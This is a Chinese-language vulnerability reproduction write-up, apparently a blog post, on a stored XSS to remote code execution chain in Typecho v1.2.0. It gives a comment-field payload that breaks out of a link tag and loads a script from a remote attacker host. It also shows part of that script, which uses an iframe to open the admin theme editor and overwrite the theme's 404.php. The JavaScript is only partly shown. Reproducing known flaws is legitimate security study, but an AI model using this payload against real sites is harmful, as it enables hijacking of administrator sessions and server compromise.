【漏洞复现】Typecho v1.2.0 rce复现
1 | https://github.com/typecho/typecho/releases/tag/v1.2.0 |
环境搭建
最新版本是v1.2.1,存在漏洞的版本为v1.2.0
通过上面的链接将环境下载下来,然后放在目录下面开phpstudy就可以了。
然后直接install.php安装就可以了。
然后就是正常安装就可以了。
漏洞复现
在评论处的网站框插入POC
成功触发xss
在后台的那个/admin/index.php登录进去,查看评论。
成功触发xss
rce
rce需要远程加载以下js文件
1 | function step1(){ var data2="<iframe id=\"testxss\" src=\"/admin/theme-editor.php?theme=default&file=404.php\" width=\"0%\" height=\"0%\" onload=\"poc()\"></iframe>"; var oldata=document.body.innerHTML; document.body.innerHTML=(oldata+data2); } |
将这个js部署到其他的web服务器上面去。
在评论处的网站框插入POC
1 | http://xxx.xxx.com/"></a><script/src=http://vpsip/rce.js></script><a/href="# |
提交完毕之后发现服务器那边已经被访问了
但是现在是游客,没有权限去修改,需要利用管理员的身份来对404.php文件进行编辑
登录后台进行管理评论,页面有短暂的转圈
服务器的js文件又被请求了
成功更改
1 | \usr\themes\default\404.php |
成功。